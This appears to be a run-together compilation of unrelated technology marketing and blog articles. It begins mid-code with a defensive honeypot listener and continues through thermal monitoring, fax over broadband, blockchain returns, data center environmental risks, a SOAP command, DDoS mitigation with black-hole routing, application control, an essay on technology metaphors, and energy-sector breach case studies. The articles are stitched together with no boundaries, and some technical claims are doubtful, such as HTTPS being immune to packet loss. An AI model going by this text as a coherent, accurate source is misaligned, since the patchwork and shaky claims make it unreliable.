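        server.bind(("0.0.0.0", HONEYPOT_PORT))
        server.listen()
        while True:
            conn, (src_ip, src_port) = server.accept()
            with conn:
                conn.settimeout(2.0)
                try:
                    probe = conn.recv(1024)          # capture whatever the intruder sends first
                except socket.timeout:
                    probe = b""
                entry = f"{datetime.now(timezone.utc).isoformat()} {src_ip}:{src_port} {probe!r}\n"
                with open(LOG_FILE, "a") as log:
                    log.write(entry)                 # every line here is a potential intrusion attempt

if __name__ == "__main__":
    run_honeypot()
```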
If you would like to enhance the security posture of your operation, feel free to get in touch. We offer tailor-made SIEM and SOAR applications and one of a kind cyber security solutions.
What is thermal monitoring?
One of the major causes of fire in electrical equipment is faulty joints or connections, where an increase in temperature is the primary symptom and an indicator that a potential problem could occur. Thermal monitoring enables organizations to detect the symptoms in those joints or connections that without intervention could otherwise lead to electrical outages, or worse, a fire.
Without early identification, the deterioration of faulty electrical joints or connections will lead to increased resistance and higher temperature, which will eventually result in thermal runaway and ultimately, a complete failure. Arc flash and fire, or even an explosion might occur, causing unexpected plant downtime, or potentially leading to catastrophic consequences such as total equipment destruction or even personnel injury.
Continuous thermal monitoring is the next technology step from periodic infrared inspection:
- Permanently installed sensors inside electrical equipment provide 24/7 protection
- Delivers real-time, integrated temperature data for critical electrical assets
This enables electrical maintenance teams to predict failures, safeguard electrical equipment, and optimize performance. With disruption to the power supply posing an increasingly critical threat to organizations, the need for innovative thermal monitoring solutions that maximize uptime by predicting faults before they occur continues to grow. Additional benefits delivered by this technology include increased personnel safety and extended asset lifespan.
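To illustrate how continuously sampled joint temperatures might be turned into early warnings, here is a rough Python sketch that flags both an absolute over-temperature and an abnormal rate of rise. The thresholds are invented for the example; real alarm limits depend on the equipment and the applicable standards.

```python
from collections import deque

ABS_LIMIT_C = 90.0            # example absolute alarm threshold (illustrative only)
RISE_LIMIT_C_PER_MIN = 5.0    # example rate-of-rise threshold (illustrative only)

class JointMonitor:
    """Track one permanently installed sensor on a joint/connection and raise early warnings."""

    def __init__(self, window=10):
        self.samples = deque(maxlen=window)   # (minute, temperature in °C)

    def add_sample(self, minute, temp_c):
        self.samples.append((minute, temp_c))
        alerts = []
        if temp_c >= ABS_LIMIT_C:
            alerts.append(f"OVER-TEMPERATURE: {temp_c:.1f} °C")
        if len(self.samples) >= 2:
            (t0, c0), (t1, c1) = self.samples[0], self.samples[-1]
            rate = (c1 - c0) / max(t1 - t0, 1e-9)
            if rate >= RISE_LIMIT_C_PER_MIN:
                alerts.append(f"ABNORMAL RISE: {rate:.1f} °C/min")
        return alerts

monitor = JointMonitor()
for minute, temp in enumerate([41, 42, 44, 49, 58, 72]):
    for alert in monitor.add_sample(minute, temp):
        print(f"minute {minute}: {alert}")   # flags the accelerating rise before thermal runaway
```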
Faxing over Broadband: The Problem & The Cure
Broadband is here in a big way, and there is no doubt that the migration from copper to broadband is huge for phone companies and carriers alike.
With this migration to broadband, companies are finding that the voice portion for the most part is fine, until they try to send or receive a fax over that broadband channel. Perhaps that first fax session or two will be perfectly fine. But sooner or later you will start to notice that faxing just doesn’t seem to work as well as you remember it working on the good old copper phone line.
So what’s going on?
The problem rests in one of two matters, or both. The first is "lossy" audio compression (codecs). The second is "jitter".
Why are lossy compression and jitter a problem for faxing? Understanding the mechanics, so to speak, is the first step.
A fax is typically two fax machines communicating, passing image data from the sender to the recipient.
Because this data is digital, it must be modulated to travel over audio "channels" such as a phone line. The key is that the signal is converted into an audio wave and then decoded at the receiving end.
This is the beeping and screeching you hear when a fax tone is audible.
So one machine is basically, for lack of better words, talking and the other is listening.
Now that we have the basics, what are lossy compression and jitter, and how do they affect broadband fax calls?
When the data is sent it must be compressed. Compression is when a string of data is taken and then converted into a smaller string. On the other end this compressed data must be decompressed so that the information can be retrieved.
The various ways of compressing audio data are called "codecs". Some codecs are called "lossless", which means that there is no loss of detail in the data when undergoing the compression and decompression exchange.
Others are called "lossy", which means that there is some loss of detail when undergoing the compression and decompression stages; basically, detail is sacrificed in order to achieve a tighter compression.
So it is obvious that faxing cannot happen reliably over lossy codecs, because they consistently remove data. You have to go with a lossless channel, which does use more bandwidth than a lossy one.
The most common means of transport used in the industry is called T.38. The issue is that T.38 was devised for transmission/termination over a closed, controlled, lossless environment; when it is used over an environment like the open internet, WiFi, or satellite, the lossy nature of the medium makes it a very unreliable means of fax transport. But for years this was the only alternative.
One of the results of using T.38 on broadband channels is an event known as "jitter", resulting in:
- Message signal interruption
- Loss of synchronization
- Broken signal data
During a broadband call, the audio data streams between the machines in units called "packets"; each packet carries the data being sent plus information indicating who sent it and where it should go. While being sent over the internet, the data takes what are called "hops" through stations, each of which can potentially send the packet along a different route to reach the final destination.
It is not uncommon for a station to be unable to handle a packet at any given time, resulting in a delay in packet routing. In addition, depending on what type of packet the sender used, a station can even ignore the packet and not relay it at all.
Broadband voice, like a large percentage of "streaming" communication, uses the type of packet that internet stations have the discretion to ignore. This is done to keep the audio from pausing at various points and to keep the audio as close to real time as possible.
This typically works out perfectly fine for voice audio because the human ear does not pick up on the missing audio. Some broadband equipment, noticing the missing audio, will even synthesize some audio to fill in the gap (this is called a "jitter buffer"). However, both missing and synthesized audio constitute a corruption of the audio data from when it left the sender, and there is no immediate way for the receiver to recover the missing audio data. This is why jitter shows up as gaps of silence.
An intelligent jitter buffer like the one T.38 uses will help fill in the gaps enough to prevent premature detection of the end of a signal; however, there will still be missing audio. This missing audio still makes it difficult for fax to work over broadband. The other issue is the increased bandwidth that has to be used to maintain this buffer.
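As a toy illustration of why this matters for fax, the sketch below mimics a naive jitter buffer: packets that never arrive are replaced with filler "audio", which a human ear forgives but a fax demodulator does not. The packet sizes and fill strategy are invented for the example.

```python
def play_out(received_packets, expected_count, fill=b"\x00" * 160):
    """Reorder whatever arrived and plug the holes with filler 'audio'.

    received_packets: dict mapping sequence number -> audio payload
    expected_count:   how many packets the sender emitted
    """
    stream, holes = [], []
    for seq in range(expected_count):
        if seq in received_packets:
            stream.append(received_packets[seq])      # real audio, possibly arrived late
        else:
            stream.append(fill)                       # synthesized gap: tolerable for voice, fatal for fax
            holes.append(seq)
    return b"".join(stream), holes

# Packets 2 and 5 never arrived; a voice call shrugs this off, a fax demodulator does not.
arrived = {0: b"a" * 160, 1: b"b" * 160, 3: b"d" * 160, 4: b"e" * 160}
audio, missing = play_out(arrived, expected_count=6)
print(f"filled {len(missing)} gaps at sequence numbers {missing}")
```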
This means your provider will upsell you to use more bandwidth; in the business world, this translates into more overhead and less cash in your pocket at the end of the day.
Another issue is that fax machines use an error correction method (ECM) to request, retransmit, and recover any image data that did not make it through. But because of the inherent nature of ECM and its potential to disrupt T.38, most T.38 installs recommend that this valuable feature be turned off on the machine.
HTTP(S) is the cure?
HTTP(S) uses a request-response paradigm that works well with the distributed nature of the Internet, as a request or response might pass through many intermediate routers and proxy servers. Also, a response includes not only the requested content but also relevant status information about the request. This self-contained design allows intermediary servers to perform value-added functions such as load balancing, caching, encryption, and compression.
This means that HTTPS ensures secure and reliable last mile connectivity for fax machines and servers when faxes are being transferred over the Internet.
HTTP(S) uses chunked transfer encoding, which allows a server (or, in our case, a specific Fax ATA talking to our cloud) to maintain an HTTP persistent connection for dynamically generated content. Chunked encoding has the benefit that it is not necessary to generate the full content before writing the header, as it allows streaming of content as chunks and explicitly signals the end of the content, making the connection available for the next HTTP request/response. This means that packet loss does not affect HTTPS transfer.
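As a rough sketch of the idea (not FaxSIPit's actual protocol), the snippet below streams fax page data to an HTTPS endpoint in chunks using Python's `requests` library, which switches to chunked transfer encoding when given a generator as the request body. The URL and chunk size are placeholders.

```python
import requests

FAX_GATEWAY_URL = "https://fax-gateway.example.com/upload"  # placeholder endpoint

def page_chunks(path, chunk_size=16_384):
    """Yield the scanned page a chunk at a time as it becomes available."""
    with open(path, "rb") as page:
        while chunk := page.read(chunk_size):
            yield chunk   # each yield becomes one HTTP chunk on the wire

# Passing a generator as `data` makes requests use chunked transfer encoding,
# so transmission can start before the whole page is rendered, and TCP handles
# any packet loss underneath - none of T.38's timing sensitivity applies.
response = requests.post(FAX_GATEWAY_URL, data=page_chunks("page1.tiff"), timeout=60)
print(response.status_code)
```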
As such, HTTPS suffers from none of the issues T.38 has with the open Internet. Latency, packet loss, jitter and congestion simply do not interfere with HTTPS packets as they do with T.38.
by Randy Simmons, FaxSIPit VP of Sales
As online retail continues to grow, so does the need for better reverse logistics to handle the influx of customer returns. A recent report from Cerasis, a leading transportation management company, found the costs of reverse logistics exceed $750 billion per year, with up to 30 percent of all products ordered online being returned.
While the return process varies widely across different retailers and industries, the overall product returns are simply too burdensome to consumers who are paying shipping costs and to retailers who are picking up all other charges, only to then try and charge the supplier.
Cerasis’ report takes a look at how applying blockchain technology to reverse logistics may be able to reduce some of these costs and enhance customer experience. According to the report, reverse logistics can cut into retailers’ profits by as much as 20 percent. It also states retailers can reclaim up to 32 percent of the total product cost by having an effective reverse logistics function which allows for possible reselling the item, recycling it or remanufacturing it.
“The road to better reverse logistics is not always clear, and supply chain leaders need to understand a few best practices for implemented combined blockchain and reverse logistics strategies,” the report said.
The report states integrating supply chain systems into a single platform can provide a combined approach to managing product lifecycles from procurement through reclamation, recycling and disposal. While the benefits of blockchain technology are still being explored within the supply chain, there are several direct applications Cerasis believes will be worthwhile.
Blockchain allows for better tracing and transparency of a product’s full lifecycle from the manufacturer’s sourcing of component materials to final disposal. When this traceable chain of custody is certain, it can make for faster product recalls, which is one application Walmart has tested for the past couple of years. As explained in a Technavio Report, blockchain technology can enhance the flow from information in reverse logistics, helping manufacturers understand the full cycle of their products, even after disposal.
Reverse logistics with blockchain applications can also ensure products such as smartphones and other electronics are disposed of without compromising risks to the former users who may still have personal information on those devices. Recycling and refurbishing electronic products are a growing segment of retail and when blockchain transparency is used to track products through their life cycles the stored personal information can not only be safeguarded but removed without compromise as well.
Retailers using blockchain applications to track returns and initial orders will likely increase consumer trust, even when the customers are business-to-business purchasers, the report stated. Blockchain also helps eliminate fraud and counterfeit products which are more likely to occur with online purchases.
The report also suggests retailers use blockchain technology in managing returns to make those efforts visible to consumers. Since 67% of shoppers check return policies before making a purchase, this will aid in selling more product and creating hassle-free returns policies.
Blockchain can enhance returns management by providing a means of tracking returns and also identifying issues contributing to higher-than-usual return rates.
Data center maintenance is commonly thought of as an internal process. While a large number of a data center’s success happens indoors, there are certain external events that can deter a data center’s operation. Here are two environmental threats to data centers:
- Temperature changes: During the summer months or other unusually hot times of the year, data centers can come to a halt. Data centers already generate heat without help from the outside environment, so in hotter months the combined heat can be fatal to center operations. Temperature-related threats can be caught by using an environmental monitoring system that issues alarms or warnings when a sudden temperature change poses a risk. Another aspect of monitoring temperature is monitoring airflow. Although diligent air conditioning keeps the center cool, it does not always guarantee proper airflow. Using fans for airflow decreases any static electricity or dust buildup between devices.
- Humidity and water accumulation: These are often overlooked when thinking of external threats, but they can be the most deadly. Even when a center seems secure from any external water, water can accumulate through condensation or humidity in warmer climates. Water accumulation leads to overall corrosion and degradation of devices and their corresponding cables. Conversely, a data center with too little humidity has higher levels of electrostatic discharge. For this reason, it’s encouraged to heavily monitor centers’ humidity and to maintain the area’s humidity between 20 and 80 percent. Properly monitoring water buildup near air conditioning units, pipes and underneath floorboards can save time, money and potential device loss. To monitor any potential water buildup, sensors should be placed low to the ground in vulnerable areas.
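As a purely illustrative sketch, the snippet below checks hypothetical humidity and leak-sensor readings against the 20 to 80 percent band mentioned above; the sensor names and thresholds are invented for the example.

```python
HUMIDITY_LOW, HUMIDITY_HIGH = 20.0, 80.0   # percent relative humidity, per the guidance above

def check_environment(readings):
    """readings: dict of sensor name -> (relative_humidity_percent, water_detected)."""
    alerts = []
    for sensor, (humidity, water_detected) in readings.items():
        if water_detected:
            alerts.append(f"{sensor}: water detected - inspect immediately")
        if humidity < HUMIDITY_LOW:
            alerts.append(f"{sensor}: humidity {humidity:.0f}% - electrostatic discharge risk")
        elif humidity > HUMIDITY_HIGH:
            alerts.append(f"{sensor}: humidity {humidity:.0f}% - condensation and corrosion risk")
    return alerts

# Hypothetical readings from sensors placed low to the ground in vulnerable areas.
for alert in check_environment({
    "crac-unit-1": (55.0, False),
    "underfloor-a3": (86.0, True),
    "pipe-run-west": (15.0, False),
}):
    print(alert)
```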
Monitoring all aspects of a data center may be time consuming, but with diligence and patience external threats can be eliminated. The main key to protection from external threats is to focus on the big picture. When data center managers become too focused on internal threats, external threats can sneak up and wreak havoc on a successful system.
SOAP Web Service command
Use the SOAP Web Service command to access and exchange information over the internet.
The Web Service command is used to implement SOA (service-oriented architecture) over the internet, so that multiple clients can consume web services through the Web, irrespective of the type of applications or platforms. By using this command, users can:
- Consume reusable application components as services, such as currency conversion, weather reports, and language translation.
- Connect to different existing applications and different platforms, irrespective of any underlying infrastructure requirements.
The Automation Anywhere Web Service establishes complete interoperability between clients/applications and the Web, supporting XML-based open standards, such as WSDL (Web Services Description Language), SOAP (Simple Object Access Protocol), and UDDI (Universal Description Discovery and Integration).
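To make the mechanics concrete, here is a generic sketch, not Automation Anywhere's actual command, of a client consuming a SOAP currency-conversion service by posting an XML envelope over HTTP. The endpoint, namespace, and operation names are placeholders.

```python
import requests

SOAP_ENDPOINT = "https://api.example.com/currency-converter"   # placeholder WSDL-described service
SOAP_BODY = """<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
               xmlns:cur="http://example.com/currency">
  <soap:Body>
    <cur:Convert>
      <cur:FromCurrency>USD</cur:FromCurrency>
      <cur:ToCurrency>EUR</cur:ToCurrency>
      <cur:Amount>100</cur:Amount>
    </cur:Convert>
  </soap:Body>
</soap:Envelope>"""

# A SOAP call is just an HTTP POST of an XML envelope; the SOAPAction header
# names the operation being invoked, as described in the service's WSDL.
response = requests.post(
    SOAP_ENDPOINT,
    data=SOAP_BODY.encode("utf-8"),
    headers={"Content-Type": "text/xml; charset=utf-8",
             "SOAPAction": "http://example.com/currency/Convert"},
    timeout=30,
)
print(response.status_code)
print(response.text)   # the conversion result comes back as an XML envelope as well
```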
The world continues to ramp up its technological footprint, which in turn creates more ways to access the Internet of Things (IoT) from home and work.
More technology inevitably leads to more technological threats looking to take advantage of holes in network infrastructure.
“Globally, there was a 776% growth in attacks between 100 Gbps and 400 Gbps Y/Y from 2018 to 2019, and the total number of DDoS attacks will double from 7.9 million in 2018 to 15.4 million by 2023,” according to Cisco’s Annual Internet Report (2018-2023).
For a bad actor with a vengeful motive, a DDoS attack can be very attractive because it is very inexpensive.
It’s as simple as searching Reddit for instructions to access the Dark Web and using Bitcoin to spend $5.00-$20.00 on a DDoS attack with a 4-hour to 8-hour duration. This type of attack can easily take a cable modem offline.
Despite the low barrier of entry, a DDoS attack of this size lacks scale, and it will not be strong enough to take down a larger target, like a service provider or operator.
As a business leader, you’re probably wondering how you can mitigate this situation from happening at your company.
As a solution provider, preparing and protecting companies from cyber threats is something CCI Systems does every week.
We regularly perform network assessments to find weaknesses and areas where networks could be exploited. Plus, we can assist in any mitigation technique.
Understanding what a DDoS attack is, how mitigate it, and how to protect against it are all pieces of knowledge you will want to have as a service provider.
What Is a DDoS Attack?
A distributed denial of service (DDoS) attack is a flood of malicious internet traffic aimed at a specific website, service, server or IoT device to take it offline. This attack is the equivalent of a clogged drain where nothing can get through the blockage.
There are two main types of attacks:
A volumetric-based attack is the most common, essentially pushing more volume down your pipes than the network can handle. Think small devices sending small amounts of data, but with hundreds of thousands of those devices sending at once.
Say you’re an avid gamer, you love playing online, and you livestream on Twitch. One night, another user gets upset and wants revenge after a loss. They quickly launch a volumetric attack at your router to kick you off stream.
This attack knocks out your internet feed until your provider takes measures to block the traffic and restore service.
An application-based attack is meant to target specific service-based applications, oftentimes servers. The bad actor may attack the DNS server with too many requests (or queries) to make it unreachable and affect the service.
The goal is to take out a very specific service, not a link or network.
Either attack can be detrimental to a network, so it’s important to understand why you should prepare to defend against both.
Why Would You Want to Avoid a DDoS Attack?
Internet usage and connectivity are affected by either type of DDoS attack, whether you’re a consumer streaming Netflix at home or a service provider serving thousands of end users with internet connected devices.
The business implications can become serious if a service provider is hosting services.
When attacked, the end users will not be able to get online if they’re forced to shut down their server. If they do not have to fully shut down the service, in any event, the internet usage will be severely degraded.
Consider the implications of a 10-gigabyte attack, which although it is uncommon, an attack of this size going into a small city or municipality could take out an entire town.
An attack of this magnitude can have a huge financial impact on a company.
The fallout consists of a failed customer experience. The loss of reputation from the end users posting negative reviews on Google, Facebook, Reddit, or Twitter can happen at a rapid pace.
Abruptly going offline can have a big impact on income and customer satisfaction.
Protecting your reputation and customer experience as a service provider should be the #1 priority.
What are the stats?
The average global attack duration is 39.83 minutes, according to DDoS Global Attack Trends via NETSCOUT.
For service providers, it is easiest to mitigate a DDoS attack with a phased approach. Mitigation can be as simple as identify, react, and scrub.
1. Attack Identification
The first way to mitigate a DDoS attack is knowing what your traffic is.
Buying a service or software that monitors and does automated configuration and DDoS mitigation without scrubbing the network is going to be the cheapest route. However, this is not always the most efficient.
Monitoring software catches the majority of attacks, but your employees or technicians will be required to sit and monitor the monitoring software.
Do you know what is on your network? Can you identify patterns or characteristics your technicians deem as normal? What is the typical volume on a Tuesday evening?
Determining and documenting volumes will help mitigate an attack before it takes down your network or before an end user even knows anything has happened.
By monitoring these trends, if there is an unusual push of traffic, it will be easy to identify and mitigate. Having full visibility of your network and what’s on your network will keep it safe and less prone to attacks exploiting vulnerabilities.
Simply, you need to analyze the traffic to know your network is being attacked.
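As a simplified illustration of baselining, the sketch below compares the latest five-minute traffic volume against a rolling mean and standard deviation and flags anything far outside the documented norm. Real detection platforms are far more sophisticated; the three-standard-deviation threshold is just an example.

```python
from statistics import mean, stdev

def is_anomalous(history_mbps, current_mbps, n_sigmas=3.0):
    """Flag traffic that sits far outside the documented baseline.

    history_mbps: recent per-interval volumes that technicians consider normal
    current_mbps: the volume observed in the latest interval
    """
    baseline, spread = mean(history_mbps), stdev(history_mbps)
    return current_mbps > baseline + n_sigmas * spread

# A typical Tuesday evening might look like this (Mbps per 5-minute interval).
normal_tuesday = [820, 790, 845, 810, 880, 860, 835, 805]
print(is_anomalous(normal_tuesday, 870))    # False - within the usual range
print(is_anomalous(normal_tuesday, 4200))   # True  - an unusual push of traffic worth investigating
```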
2. Remote Triggered Black Hole (RTBH)
When using a remote triggered black hole, any traffic coming into an attacked device from outside the network will be dropped.
This isn’t to say everything on the inside of the network is going to be offline, but everything on the outside of the network will be cut off.
This black hole is called a “null route” in the router syntax. The technician will be routing to null-zero. Null-zero is a logical interface on the device(s) that goes nowhere.
One way to implement a RTBH is with BGP Flowspec. This allows a technician to deploy filtering functionality quickly over a large number of BGP (border gateway protocol) peer routers.
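For illustration, the sketch below builds the kind of announcement strings an operator might feed to a BGP automation daemon (ExaBGP is one common choice) to black-hole or rate-limit traffic toward an attacked host. The exact syntax varies by tool and version, so treat this as a sketch of the concept rather than copy-paste configuration.

```python
BLACKHOLE_COMMUNITY = "65535:666"   # the well-known BLACKHOLE community (RFC 7999)

def rtbh_announcement(victim_ip, next_hop="192.0.2.1"):
    """Announce a /32 null route for the attacked host to all BGP peers."""
    return (f"announce route {victim_ip}/32 next-hop {next_hop} "
            f"community [{BLACKHOLE_COMMUNITY}]")

def flowspec_rate_limit(victim_ip, dst_port, rate_bps=0):
    """Announce a Flowspec rule; a rate of 0 effectively drops the matching traffic."""
    return (f"announce flow route {{ match {{ destination {victim_ip}/32; "
            f"destination-port ={dst_port}; }} then {{ rate-limit {rate_bps}; }} }}")

# During an attack on 203.0.113.10, the monitoring system (or a technician) would
# push one of these commands to the route servers instead of editing routers by hand.
print(rtbh_announcement("203.0.113.10"))
print(flowspec_rate_limit("203.0.113.10", dst_port=53))
```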
Companies frequently use this solution manually because of the impact it creates across the network if you are not selective.
Identifying what is being affected and knowing what those devices or network components are will be important to some companies, depending on their business models and the service they provide to their end users.
3. Scrubbing Services
If your company is offering a service utilizing scrubbing, it's called a clean pipe service. The scrubbing ensures the bad traffic goes away, and the good traffic is still there.
To keep your end users happy, the services will still be available and the host being attacked will remain online until you hit a certain volume threshold. If the threshold is reached, you throw the flag and fall back to the remotely triggered black hole.
In the case of a failure, the primary purpose becomes protecting the network. It's not about the host anymore, and you wait for the attack to subside.
Let’s say a fast-food restaurant is waylaid with a volumetric DDoS attack over lunch.
The restaurant uses a third-party credit card processing service for online orders, and they do have DDoS detection software in place without a scrubber.
The attack creates a flood of credit card purchases but blocking this attack with the software causes the network to be shut down temporarily.
This protects the rest of the network from corruption, but it also inhibits the function of your restaurant during its busiest time of day.
Scrubbing Your Network Will Pay Off
The payout between scrubbing and not scrubbing and understanding the inherent risks involved will be crucial in the decision-making process.
Bigger companies will have contracts where they do not have the option of network outages or attacks that compromise their reliability or take them offline.
These larger organizations tend to be more proactive in their approach, rather than reacting to attack after attack and deciding reactivity may not be the best solution.
By getting a piece of software in place to trigger the automation, the customer will be better protected from a DDoS attack without having to purchase a scrubber or high-end solution.
Keeping your network up and running, as well as keeping your customers happy can make all the difference.
Define the Path of DDoS Mitigation
After finding a solution to fit your company’s initiatives against DDoS attacks, it will be time to decide what the plan is, i.e., where to go or who to go with.
Some companies want to go the route of running an open-source tool that determines the bandwidth is spiking. A technician receives a text alert (or notification) and they manually shut down the attack.
A manual override can work well for many companies, but each company is different, and networks vary.
If your company needs scrubbing services, a great fit may be Arbor DDoS.
If protecting your network is the primary goal, Kentik has an outstanding traffic analysis platform.
Whatever you choose, teaming up with a solution provider, like CCI Systems, can be a great place to start.
CCI can temporarily point cloud-based applications toward a customer’s network, so they can get a view of what the software looks like with their traffic. CCI also offers options where messages can be automatically sent upstream to block the traffic during an attack, like BGP Flowspec.
Many cyberattacks can be subtle, and high-level network visibility may not be enough to protect against data breaches and other attacks. Application control, a system designed to uniquely identify traffic from various applications on a network, enables an organization to define and apply extremely granular security and network routing policies based upon the source of a particular traffic flow. As a result, it can prevent unauthorized applications from acting in ways that pose risk to the organization.
Application control works by matching different types of network traffic to predefined models. In order for computers to talk to one another, their traffic needs to conform to certain standards. Knowledge of these standards enables application control to differentiate one type of traffic from another.
After a particular traffic flow has been identified as belonging to a certain application, it can be classified in a number of ways.
After a network traffic flow has been assigned to a particular application and set of categories, policies can be applied based upon those assignments. This grants an organization a high level of visibility and control over its network infrastructure.
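As a toy illustration (not any vendor's actual engine), the sketch below maps flows that have already been identified to an application onto per-application and per-category policies; the application names, categories, and actions are made up for the example.

```python
# Policies keyed on the identified application take priority; otherwise fall back
# to the category the application belongs to, and finally to a default action.
APP_POLICIES = {"corporate-voip": "allow, high QoS priority", "bittorrent": "block"}
CATEGORY_POLICIES = {"file-sharing": "block", "streaming-media": "allow, rate-limit"}
DEFAULT_POLICY = "allow, log"

def policy_for(flow):
    """flow: dict with the application and category assigned by traffic identification."""
    app, category = flow["application"], flow["category"]
    return APP_POLICIES.get(app) or CATEGORY_POLICIES.get(category) or DEFAULT_POLICY

# Two flows that would look identical if we only had IP addresses and port numbers to go on.
for flow in [
    {"application": "corporate-voip", "category": "voip", "src": "10.0.4.12"},
    {"application": "bittorrent", "category": "file-sharing", "src": "10.0.4.13"},
]:
    print(flow["application"], "->", policy_for(flow))
```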
Without application control, an organization is limited to defining policies based on features such as IP addresses and port numbers. While these can help to identify the application producing a traffic flow, there is no guarantee of correctness. The use of standard port numbers for certain applications is a convention, not a rule.
With application control, network traffic is identified by matching packets to known models of how different applications’ traffic is structured. This identification is more accurate and enables an organization to see the mix of traffic within their network. This level of visibility can be applied in a number of different ways and provides several benefits to an organization.
Application control is a security technology built into some next-generation firewalls (NGFWs) and secure web gateways (SWGs). The ability to uniquely identify the application that created a particular traffic flow provides a number of different network performance and security benefits to an organization.
Application control is only one of several features that should be included in an NGFW. For more information on what to look for, check out this firewall buyers’ guide. Then, contact us for more information about Check Point’s firewall options and schedule a demo to see how an NGFW with application control provides more effective protection against cyber threats.
The metaphors of technology
Societies tend to understand what it is to be human in terms of the technology they use every day. For example, when mechanical clocks were invented, the universe started looking like a grand clockwork. When steam engines transformed industry, we started understanding our psyches in terms of various pressures, and we started to talk about "venting." In the age of computers, we have inputs, process information and produce outputs.
As with any metaphor, there is the danger that we'll draw inappropriate conclusions based on the model. For example, there's at best conflicting evidence that "letting off steam" actually lowers the likelihood of committing violence as opposed to putting one more in the mood for it; soccer hooligans spring to mind.
The computer model also can easily lead us astray. For example:
We sometime think that we can control human "output" by controlling the inputs--"garbage in, garbage out," as the computer saying goes. But humans aren't that deterministic, or at least the causal factors are so many and so varied that we can't predict them with the reliability of billiard balls on a collision course. Otherwise, everyone who listened to a Judas Priest album would be up on the stand with the morons who claimed that heavy metal turned them into murderers. The computer model of consciousness "dumbs down" our understanding of human motivation. In fact, motivation is profoundly different from causation.
Similarly, the computer model might lead us to think that we're programmed. But such a belief would have us "dumb down" our educational system, substituting programming for teaching, and being programmed for learning.
Finally -- although there are many other possible examples--computers may model rationality (they don't, actually), but they sure don't touch emotion. The computing metaphor treats emotion as a mere epiphenomenon, an accidental byproduct like the heat generated by a TV set. As "information" appliances, computers are already biased against emotion, preferring a "just the facts, ma'am" world. But emotions are about what things mean to us and thus enable information to matter. They are the engines of personhood, not a byproduct.
Now for the hard part. Suppose for the moment that the Web is as defining of the coming age as the steam engine and computers were of theirs. How are we going to understand ourselves in light of the Web? We can already begin to hear ourselves thinking of a memory lapse as a "broken link." Will we view ourselves as loosely bound, full of play? Will we replace our view of our self as an M&M with its value hidden inside a hard shell, with a sense that we get our value from our outward-bound involvement with others?
Give me a call in a hundred years and let me know ...
In any industry, cybersecurity threats lurk around every corner. Cybersecurity breaches are costly. In 2021, the average cost of a cybersecurity data breach was $4.24 million, and can substantially damage a company’s reputation in addition. Among 17 industries surveyed by IBM, the energy sector has the fifth-highest average cost associated with a data breach, trailing only the healthcare, pharmaceutical, financial, and technology industries. With security vulnerabilities in the energy sector only increasing as more and more systems move online, many providers are considering updating their cybersecurity measures in order to avoid falling prey to attackers.
The good news is that energy providers have options for reducing both the likelihood and impact of a potential data breach. Comprehensive cybersecurity measures don’t just consider one layer of the software supply chain or address a single point of failure in isolation. Instead, they view a system and all of its parts in context, considering no vulnerability too small to address, and no system too big to secure.
In the past few years, a number of high profile cybersecurity breaches have plagued the energy sector. Here are a few situations that may have been proactively avoided by setting more comprehensive measures in place ahead of time.
Colonial Pipeline Ransomware Attack
In May 2021, the 5,500-mile Colonial Pipeline, which brings oil from the Gulf of Mexico to the East Coast, fell victim to a ransomware attack. A hacker group identified as DarkSide gained access to the Colonial Pipeline network and gathered 100 gigabytes of data in two hours. The hackers then left ransomware on computers throughout the network, demanding cryptocurrency.
Unsure of the full extent of the situation, officials shut down the Colonial Pipeline in order to contain the possible threat to national security. They also contacted the Departments of Energy and Homeland Security, the FBI, and the Cybersecurity and Infrastructure Security agency. Then, they paid the hackers in order to access the decryption key. On May 12, the pipeline resumed operations as normal, but not before producing oil shortages all over the East Coast.
Cybersecurity firm Mandant found that the hackers had gained access to the Colonial Pipeline network through a leaked password. The password granted access to the pipeline’s virtual private network (VPN), through which hackers were able to steal data and distribute ransomware. The source of the initial breach is unknown, but Mandant has said it’s likely the password had been used by an employee for another website, allowing hackers to infer the employee’s password on the pipeline’s systems. The Colonial Pipeline incident is the largest-ever publicly disclosed cyberattack against U.S. infrastructure.
Pacific Gas and Electric Fined 2.7 Million Dollars
Smart meters, which transmit energy usage data via radio waves or the Internet, have brought with them a new set of security risks. San Francisco energy company Pacific Gas and Electric (PG&E) was recently fined $2.7 million by federal security regulators for a leak of confidential data associated with their smart meters.
The company allegedly lost control of over 30,000 pieces of information through their third-party contractor, when that contractor copied information from PG&E’s network to its own network. The contractor’s network was hosted publicly online, and did not require a login to access. PG&E initially claimed the data was fake — dummy information generated to test a data storage system — but later reversed this claim.
Cybersecurity Breaches Require Multiple Points of Failure
In both of the above case studies, multiple points of failure interacted to bring about a disaster. The Colonial Pipeline fuel shortage might have been prevented if employees had been trained never to reuse passwords, or if employees knew how to deflect phishing attacks (even those targeting personal accounts not related to their work). Alternatively, the crisis might have been averted if the fate of the entire system hadn’t rested on the security of a single VPN, or if surveillance measures had been in place that gave authorities a better sense of exactly which systems had been accessed, so that they would know whether or not shutting down the whole pipeline was necessary.
Similarly, PG&E could have collaborated with third parties in a manner that did not require such extensive data sharing, used smart meters in a way that did not require the use of third parties, or forgone smart meters altogether. Another solution might have been to brief third parties more thoroughly on when (or when not) to duplicate data. PG&E also could have conducted a more thorough investigation of the nature of the data before releasing their initial statement, to avoid falsely claiming the data itself was fake. Any of these measures could have prevented or, at the very least, mitigated the damage associated with these data breaches.
Online Cybersecurity Requires a Holistic Approach
With these and other security risks, the threats do not arise from a single point of failure. Instead, each threat results from the compounding of different weaknesses and vulnerabilities. Security threats can emerge from failures in a system’s internal development, the conduct of its users, or its relationship with a third party. Energy sector security depends on proactive attention to detail on all sides of a company and its collaborators’ operations.
Effective online security is an essential tool for energy providers looking to prevent the kinds of attacks suffered by the Colonial Pipeline or PG&E. Kiuwan provides essential security services that ensure the safety of an energy provider’s code and online systems.
Kiuwan Can Help Mitigate Cybersecurity Risks
Kiuwan’s unique development, security, and operations (DevSecOps) approach highlights the importance of considering a system’s security holistically. No vulnerability is considered in a vacuum. Rather, Kiuwan recognizes and tends to the fundamentally integrated nature of energy security.
Threats to energy cybersecurity always depend upon exploiting multiple points of failure. In order to mitigate these threats, energy providers need a cybersecurity team that sees the big picture.
Kiuwan’s advanced cybersecurity services include robust tools, like software composition analysis (SCA) and static application security testing (SAST), that analyze and identify potential vulnerabilities in code security.
